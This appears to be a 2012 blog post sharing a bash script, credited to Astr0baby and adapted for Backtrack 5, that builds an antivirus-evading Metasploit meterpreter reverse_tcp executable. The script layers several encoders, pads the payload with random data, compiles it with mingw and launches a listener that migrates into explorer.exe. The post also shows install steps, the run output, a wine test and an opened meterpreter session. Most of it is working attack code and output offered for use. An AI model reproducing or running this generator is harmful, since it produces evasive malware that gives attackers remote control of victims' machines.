Showing posts with label payload. Show all posts
Showing posts with label payload. Show all posts

Friday, June 22, 2012

FUD Payload Generator for Backtrack


Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:
Code:
#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
Code:
rm -rf ShellCode
 
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
 
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E
In order to be able to compile the generated payload we must install the following packages:
Code:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
After the installation we must move our shell-script to default metasploit’s folder (/pentest/exploits/framework) and execute it:
Code:
root@bt:/pentest/exploits/framework# chmod +x fud.sh 
root@bt:/pentest/exploits/framework# ./fud.sh 
************************************************************
    Automatic  shellcode generator - FOR METASPLOIT         
                  By Astr0baby 2011                        
  With some Randomic gravy and sauce to bypass Antivirus    
    For Automatic Teensy programming and deployment         
************************************************************
Here is a network device list available on yor machine
 lo:
 eth0:
What network interface are we gonna use ?  eth0
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
 
20210.exe ...generated in ShellCode subfolder
20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe
      starting the meterpreter listener...
Since we have created our payload we will try to check if it works:
Code:
root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe 
fixme:system:SetProcessDPIAware stub!
fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdc
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil)
fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stub
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil)
wine: configuration in '/root/.wine' has been updated.
fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
fixme:toolhelp:Heap32ListFirst : stub
Code:
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
AutoRunScript => migrate2 explorer.exe
[*] Started reverse handler on 192.168.200.22:443 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.200.22
[*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200
 
meterpreter > ps
 
Process list
============
 
 PID  Name            Arch  Session  User                      Path
 ---  ----            ----  -------  ----                      ----
 12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
 17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
 33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
 8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe
 
meterpreter > sysinfo
Computer        : bt
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Now our payload is fully undetectable from most of antivirus engines. Of course we can try to scan it using online services such as novirusthanks:
Credits go to Astr0baby
Posted by at No comments:
Labels: , , , , , , , , , ,
Subscribe to: Comments (Atom)